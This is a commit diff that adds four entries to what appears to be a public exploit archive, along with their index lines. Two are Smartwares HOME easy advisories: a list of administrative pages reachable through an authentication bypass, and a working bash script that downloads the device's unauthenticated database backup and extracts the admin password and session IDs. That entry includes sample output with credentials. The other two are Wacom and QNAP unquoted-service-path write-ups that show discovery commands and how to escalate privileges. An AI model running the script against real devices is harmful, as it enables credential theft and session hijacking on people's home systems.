DB: 2019-11-07

4 changes to exploits/shellcodes Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure
2019-11-07 05:01:39 +00:00 · 2019-11-07 05:01:39 +00:00 · 97f133e755
commit 97f133e755
parent 52ab59aad8
5 changed files with 182 additions and 0 deletions
--- a/exploits/hardware/webapps/47595.txt
+++ b/exploits/hardware/webapps/47595.txt
@ -0,0 +1,33 @@
+# Exploit Title: Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: Smartwares
+# Product web page: https://www.smartwares.eu
+# Affected version: <=1.0.9
+# Advisory ID: ZSL-2019-5540
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php
+# CVE: N/A
+
+Summary: Home Easy/Smartwares are a range of products designed to remotely
+control your home using wireless technology. Home Easy/Smartwares is very
+simple to set up and allows you to operate your electrical equipment like
+lighting, appliances, heating etc.
+
+Desc: HOME easy suffers from information disclosure and client-side authentication
+bypass vulnerability through IDOR by navigating to several administrative web pages.
+This allowed disclosing an SQLite3 database file and location. Other functionalities
+are also accessible by disabling JavaScript in your browser, bypassing the client-side
+validation and redirection.
+
+Tested on: Boa/0.94.13
+
+/web-en/task.html
+/web-en/action_task.html
+/web-en/plan_task.html
+/web-en/room.html
+/web-en/room_set.html
+/web-en/room_set2.html
+/web-en/scene.html
+/web-en/scene_set.html
+/web-en/scene_set2.html
+/web-en/system.html
--- a/exploits/hardware/webapps/47596.sh
+++ b/exploits/hardware/webapps/47596.sh
@ -0,0 +1,62 @@
+# Title: Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: Smartwares
+# Product web page: https://www.smartwares.eu
+# Affected version: <=1.0.9
+# Advisory ID: ZSL-2019-5541
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php
+# CVE: N/A
+
+# Summary: Home Easy/Smartwares are a range of products designed to remotely
+# control your home using wireless technology. Home Easy/Smartwares is very
+# simple to set up and allows you to operate your electrical equipment like
+# lighting, appliances, heating etc.
+#
+# Desc: The home automation solution is vulnerable to unauthenticated database
+# backup download and information disclosure vulnerability. This can enable the
+# attacker to disclose sensitive and clear-text information resulting in authentication
+# bypass, session hijacking and full system control.
+
+#!/bin/bash
+#
+# ==============================================================================
+# root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004
+# Target: http://192.168.1.177:8004
+# Filename: 192.168.1.177:8004-16072019-db.sqlite
+# Username: admin
+# Password: s3cr3tP4ssw0rd
+# Version: 1.0.9
+# Sessions: 
+# ------------------------------------------------------------------
+# * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy
+# * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ
+# * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9
+# * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd
+# * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH
+# * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk
+# ------------------------------------------------------------------
+# ==============================================================================
+
+if [ "$#" -ne 1 ]; then
+    echo "Usage: $0 http://ip:port"
+    exit 0
+fi
+TARGET=$1
+CHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then
+    echo "No juice."
+    exit 1
+fi
+echo "Target: "$TARGET
+FNAME=${TARGET:7}-$(date +"%d%m%Y")
+curl -s $TARGET/data.dat -o $FNAME-db.sqlite
+echo "Filename: $FNAME-db.sqlite"
+echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin
+echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111
+echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3")
+echo -ne "Sessions: \n"
+printf "%0.s-" {1..66}
+printf "\n"
+sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*"
+printf "%0.s-" {1..66} ; printf "\n\n"
--- a/exploits/windows/local/47593.txt
+++ b/exploits/windows/local/47593.txt
@ -0,0 +1,31 @@
+# Exploit Title: Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path
+# Discovery by: Marcos Antonio León (psk)
+# Discovery Date: 2019-11-04
+# Vendor Homepage: https://www.wacom.com
+# Software Link : http://cdn.wacom.com/U/drivers/IBMPC/pro/WacomTablet_637-3.exe
+# Tested Version: 6.3.7.3
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>sc qc WTabletServicePro
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: WTabletServicePro
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
+        GRUPO_ORDEN_CARGA  : PlugPlay
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Wacom Professional Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local attacker must insert an
+executable file in the path of the service. Upon service restart or
+system reboot, the malicious code will be run with elevated
+privileges.
--- a/exploits/windows/local/47594.txt
+++ b/exploits/windows/local/47594.txt
@ -0,0 +1,52 @@
+# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path
+# Discovery Date: 2019-11-05
+# Exploit Author: Ivan Marmolejo
+# Vendor Homepage: https://www.qnap.com/en/ 
+# Software Link: https://www.qnap.com/en/download
+# Version: 4.5.6.0607
+# Vulnerability Type: Local
+# Tested on: Windows XP Profesional Español SP3
+
+#Exploit
+##############################################################################################################################################
+
+Summary:  QNAP NetBak Replicator provides several options for copying files from your Windows computer to your NAS. By simplifying the backup 
+process, NetBak Replicator helps ensure that your files are safe even when your computer becomes unavailable.
+
+Description:    The application suffers from an unquoted search path issue impacting the service 'QVssService'. This could potentially allow an 
+authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
+the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
+potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
+of the application.
+
+##############################################################################################################################################
+
+Step to discover the unquoted Service:
+
+ 
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+
+QNAP Vss Service            QVssService               C:\Archivos de programa\QNAP\NetBak\QVssService.exe 		                 Auto
+
+
+##############################################################################################################################################
+
+Service info:
+
+
+C:\Users\user>sc qc QVssService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: QVssService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Archivos de programa\QNAP\NetBak\QVssService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : QNAP Vss Service
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem
+
+##############################################################################################################################################
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10752,6 +10752,8 @@ id,file,description,date,author,type,platform,port
 47580,exploits/linux/local/47580.rb,"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)",2019-11-04,Metasploit,local,linux,
 47582,exploits/windows/local/47582.txt,"Blue Stacks App Player 2.4.44.62.57 - _BstHdLogRotatorSvc_ Unquote Service Path",2019-11-05,"Diego Armando Buztamante Rico",local,windows,
 47584,exploits/windows/local/47584.txt,"Network Inventory Advisor 5.0.26.0 - 'niaservice' Unquoted Service Path",2019-11-05,"Samuel DiazL",local,windows,
+47593,exploits/windows/local/47593.txt,"Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path",2019-11-06,"Marcos Antonio León",local,windows,
+47594,exploits/windows/local/47594.txt,"QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path",2019-11-06,"Ivan Marmolejo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41909,3 +41911,5 @@ id,file,description,date,author,type,platform,port
 47587,exploits/php/webapps/47587.txt,"html5_snmp 1.11 - 'Remark' Persistent Cross-Site Scripting",2019-11-05,cakes,webapps,php,80
 47588,exploits/php/webapps/47588.txt,"html5_snmp 1.11 - 'Router_ID' SQL Injection",2019-11-05,cakes,webapps,php,80
 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80
+47595,exploits/hardware/webapps/47595.txt,"Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass",2019-11-06,LiquidWorm,webapps,hardware,
+47596,exploits/hardware/webapps/47596.sh,"Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure",2019-11-06,LiquidWorm,webapps,hardware,